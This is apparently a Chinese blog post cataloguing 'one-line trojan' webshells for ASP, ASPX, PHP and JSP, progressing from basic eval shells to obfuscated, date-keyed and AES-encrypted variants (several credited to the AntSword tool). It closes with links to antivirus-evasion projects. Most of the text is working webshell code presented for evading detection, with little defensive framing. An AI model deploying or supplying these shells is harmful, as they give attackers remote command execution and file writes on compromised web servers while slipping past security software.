0x00:简介
一句话木马各种变形
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。一句话木马一直在跟杀软斗智斗勇,出现一种,杀软秒更新规则。木马再变形,再被杀。。。
0x01:叙事
一、常见的一句话
-
ASP:<%
eval request("pass")%>
-
ASPX:<%@ Page Language=
"Jscript"%><%Response.Write(eval(Request.Item[
"z"],
"unsafe"));%>
-
PHP:php eval(@$_POST['a']); ?>
-
JSP:<%Runtime.getRuntime().exec(request.getParameter(
"i"));%>
//无回显示执行系统命令
二、简单变形
-
ASP:<%
eval
""&(
"e"&
"v"&
"a"&
"l"&
"("&
"r"&
"e"&
"q"&
"u"&
"e"&
"s"&
"t"&
"("&
"0"&
"-"&
"2"&
"-"&
"5"&
")"&
")")%>
//-7
-
-
ASPX:<%@ Page Language = Jscript %>
-
<%
var
/*-/*-*/P
/*-/*-*/=
/*-/*-*/
"e"+
"v"+
/*-/*-*/
-
"a"+
"l"+
"("+
"R"+
"e"+
/*-/*-*/
"q"+
"u"+
"e"
/*-/*-*/+
"s"+
"t"+
-
"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
-
","+
"\""+
"u"+
"n"+
"s"
/*-/*-*/+
"a"+
"f"+
"e"+
"\""+
")";
eval
-
(
/*-/*-*/P
/*-/*-*/,
/*-/*-*/
"u"+
"n"+
"s"
/*-/*-*/+
"a"+
"f"+
"e"
/*-/*-*/);%>
//-7
-
-
PHP:
$_GET[a]($_GET[b]);
?>
-
-
JSP:<%
-
if(request.getParameter(
"f")!=
null)(
new
-
java.io.FileOutputStream(application.getRealPath(
"\\")+request.getParameter(
"f"))).write(request.getParameter(
"t").getBytes());
-
%>
三、二次变形
-
ASP:
<%if request ("MH")<>""then session("MH")=request("MH"):end
-
if:
if session(
"MH")<>
""
then
execute session(
"MH")%>
-
-
ASPX:
<%@ Page
-
Language=
"Jscript"%>
<%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36",
-
"MD5").ToUpper()],
"unsafe");%>
//随日期变化的连接密码
-
-
PHP:
($_=@$_GET[2]).@$_($_POST[1])?>
-
-
JSP:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
四、三次变形
-
ASP:
<%@Page Language="C#" %>
<%@Import namespace="System.Reflection"%>
<%if (Request["pass"]!=null){ Session.Add("k", Guid.NewGuid().ToString().Replace("-", "").Substring(16)); Response.Write(Session[0]); return;}byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
//蚁剑中的一句话
-
-
PHP:
session_start();isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION['k'])))&call_user_func($b[0],$b[1]);?>//蚁剑中的一句话
-
-
JSP:
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
<%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
//蚁剑中的一句话
五、四次变形
1、利用随机异或无限免杀d盾蚁剑版:
项目地址:https://github.com/yzddmr6/as_webshell_venom
2、利用动态二进制加密实现新型一句话木马:
文章地址:https://xz.aliyun.com/t/2799
0x02:后话
一句话木马变形有很多种方式,文中举例只是其中几种方式。千奇百怪的变形,不断的变化,都是为了躲避杀软的检测。杀软也在不断的更新规则库。两者都是在博弈中不断的强大。